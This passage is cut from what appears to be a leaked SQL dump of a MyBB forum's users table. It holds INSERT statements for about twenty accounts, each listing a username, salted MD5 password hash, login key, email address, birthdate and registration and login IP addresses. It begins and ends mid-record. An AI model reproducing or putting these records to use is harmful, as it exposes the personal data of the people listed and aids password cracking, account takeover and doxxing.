`suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('278', 'Yoess', 'ed5f4f5a7eb9c7851fcd8b702805df7d', 'Sj8D1Cpt', '39eNi1WdxxB4s7MLFYUDxMhN5mgVH8hBqjBqtJ1ydkD3Dltj5c', 'ybossenbroek@unic-utrecht.nl', '1', '', '', '', '2', '', '0', '', '1350600185', '1350615056', '1350611973', '1350600629', '', '0', '', '', '', '7-10-1996', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '228', '0', '4', '82.157.58.115', '82.157.58.115', '1386035827', '1386035827', '', '1004', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('279', 'katemory', '656535efa0b0c73db3c028b862a9eb56', '8UMohutm', '4nnqr5nMPunJrefw7F7GzFxKgd31syL6LJyuFiWCCe2tL1Z4Gl', 'briekronnick@yahoo.com', '0', '', '', '', '2', '', '0', '', '1350637912', '1350638156', '1350637912', '0', '', '0', '', '', '', '1-1-1980', 'all', '', '1', '0', '0', '1', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '122.162.83.200', '122.162.83.200', '2057458632', '2057458632', '', '244', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('280', 'Judge', '7258c4a8be0bea29b3ab812bd6dec93d', 'kOLkQFK3', 'LMTC8lg39TQc9QUWAFU2lO3w4lxhWmVfwrMDsgEOnYQV349ZnQ', 'judge@activist.com', '0', './uploads/avatars/avatar_280.jpg?dateline=1350686154', '80|80', 'upload', '2', '', '0', '', '1350641658', '1350686343', '1350682891', '0', '', '0', '', '', '', '26-11-1958', 'all', '', '1', '1', '0', '0', '1', '0', '0', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '0', '1', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '78.105.190.251', '78.105.190.251', '1315553019', '1315553019', '', '1597', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('282', 'scaryypanda', '980406706013db6a23ca7b8842625b39', 'QBW2T1Kf', 'WiXbtp8Grc94tPgKgBLhhVqRkQJovwVYR23QnrtU5CaVAWyh1Q', 'conner.a.coleman@gmail.com', '0', '', '', '', '2', '', '0', '', '1350673489', '1350674090', '1350673489', '0', '', '0', '', '', '', '24-7-1995', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '208.94.131.5', '208.94.131.5', '-799112443', '-799112443', '', '601', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('283', 'Vee', 'a305a588ae29b9d81c5921d7b25a2233', 'ta12BiEY', 'MVbulxta4azRd3OBhyz5olnw2APZQJPd7DsPF3Ay8K8JKPMwFx', 'espeon@null.net', '0', '', '', '', '2', '', '0', '', '1350732720', '1350732865', '1350732720', '0', '', '0', '', '', '', '19-11-1991', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '122.149.177.181', '122.149.177.181', '2056630709', '2056630709', '', '145', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('285', 'dccfoux', 'f6e500a1b00280ec9f8cfbf28a99d3d0', 'wLi8R2aK', 'rKxFo8RoqEaSCHPGmRccbJvZjzfTLZCz6bIEOF6HQ6V1JrxbdL', 'dccfoux@gmail.com', '8', '', '', '', '2', '', '0', '', '1350907995', '1351030889', '1350995432', '1351030378', '', '0', '', '', '', '27-5-1991', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '1', '0', '0', '71.239.97.104', '71.239.97.104', '1206870376', '1206870376', '', '3389', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('284', 'h3rcul3s', '0a5db725dfeb934a4d8c09f470db9a4b', 'gcAoNtEJ', '9ff2aPmyJcNuuCYp8RKWklTb2bJ8KxgYnWJ7p4TyyKWcvvSLRB', 'h3rcul3an@yahoo.com', '1', './uploads/avatars/avatar_284.jpg?dateline=1350911283', '120|75', 'upload', '2', '', '0', '', '1350904171', '1350919398', '1350911522', '1350916547', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '209.73.132.91', '31.172.30.3', '-783711141', '531373571', '', '3340', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('286', 'cxr37', 'a1492468ef15058c2387c69cb70142c1', 'Gp5kSKom', 'hPIgEA2UM5sD5RDk5fHOqYyoyhRHRS6HfdCVPL5Uyz1MpKeo1B', 'frank@exosfera.com', '0', '', '', '', '2', '', '0', '', '1350926848', '1350943601', '1350926848', '0', '', '0', '', '', '', '29-3-1986', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '189.231.170.101', '189.231.170.101', '-1108891035', '-1108891035', '', '1183', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('287', 'DariusB1979', '2d8952c8ccdd8cf80fc89af142807a3d', 'j8mQ8ju7', '24a9K9cX1WGhbt8RaZTVe5QmWKmiHISKF5XPeKArpt2C3WBqDw', 'Marvawux7678@yahoo.com', '0', '', '', '', '2', '', '0', '', '1350978794', '1351165666', '1350978794', '0', 'http://communities.bentley.com/members/jenamejia1970/default.aspx', '0', '', '', '', '10-8-1955', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '129.121.101.56', '129.121.102.35', '-2122750664', '-2122750429', '', '4', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('289', 'Nameless', '30d4fcf872e1ff5db79e45796937b409', 'ZYiwugL8', 'k2hH7U9EZGGkf5U4wVYUFvCOuQ82h6mM2TzcJUYVkZaAys4coh', 'br0k3n@live.se', '0', '', '', '', '2', '', '0', '', '1351091765', '1351093757', '1351091765', '0', '', '0', '', '', '', '5-1-1990', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '78.70.49.201', '78.70.49.201', '1313223113', '1313223113', '', '1992', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('328', 'Miller', 'e3fd34d6dc6cd012920c5bb484f6f777', '4BbRtsIv', 'BI3mttJwwGpqrw6o5I8iPf8FvBLWSj6PQc32nDRzWGhH3CxxQY', 'donmiller@live.co.uk', '0', '', '', '', '14', '', '0', '', '1352258721', '1352259068', '1352259068', '0', '', '0', '', '', '', '4-5-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '94.168.90.223', '94.168.90.223', '1588091615', '1588091615', '', '347', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('291', 'xXGANNONXx', '62972c077f4e7f2c20041e2939d91e56', 'VM6ICnMt', '7hMU1AXlqFaLmI29iKdARgbcDQz5LUWqJ4wIuRWTPyn3eTgEIh', 'garrylongthorn@hotmail.com', '6', './uploads/avatars/avatar_291.jpg?dateline=1351130228', '120|90', 'upload', '2', '', '0', '', '1351130000', '1351476085', '1351206742', '1351132695', '', '0', '', '', '', '14-7-1997', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '257', '0', '3', '203.104.11.14', '203.104.11.12', '-882373874', '-882373876', '', '3344', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('292', 'Hollywood0Undead', 'abd386481ca71d77693ca4a4b29d0bcb', 'RscbgkiC', 'Fg3Yk316Hj2xYaDKRg8PYOC1hWOz5IjfbaWQE1TK6Wztpffmro', 'littledevil_141412@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351238750', '1351239004', '1351238750', '0', '', '0', '', '', '', '21-12-1991', 'all', '', '1', '1', '0', '1', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '257', '0', '0', '216.218.102.116', '216.218.102.116', '-656775564', '-656775564', '', '254', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('295', 'Lollipop123', 'cbe007e60edebe6f72cac1de1a3f756d', 'kRDpMDXA', 'MQDSmRfnfII5XAtRCWAdL57SI42hxSVceKkXZJeEbIsBwPUTxb', 'MOON_BOY777@hotmail.com', '4', '', '', '', '2', '', '0', '', '1351321460', '1351340217', '1351340217', '1351321849', '', '0', '', '', '', '15-8-1998', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '257', '0', '0', '203.104.11.9', '122.108.192.197', '-882373879', '2053947589', '', '403', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('293', 'Knowledge', '621e6b6986f4119795b1cac8d44e0fd9', 'VcoNokMH', 'ZT9fPbt1AUyJdMd2lJoHVnUeq3ykaY2kURYcXkSclOVlWmN8Pr', 'Anas_a.ha@hotmail.com', '0', '', '', '', '2', '', '0', '', '1351282538', '1351971786', '1351524492', '0', '', '0', '', '', '', '11-5-1993', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '228', '0', '0', '83.83.167.183', '41.250.224.98', '1397991351', '704307298', '', '12', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('294', 'vudu3d', 'e041e47d99de069929e57945a71dc669', 'MEFgdTvG', 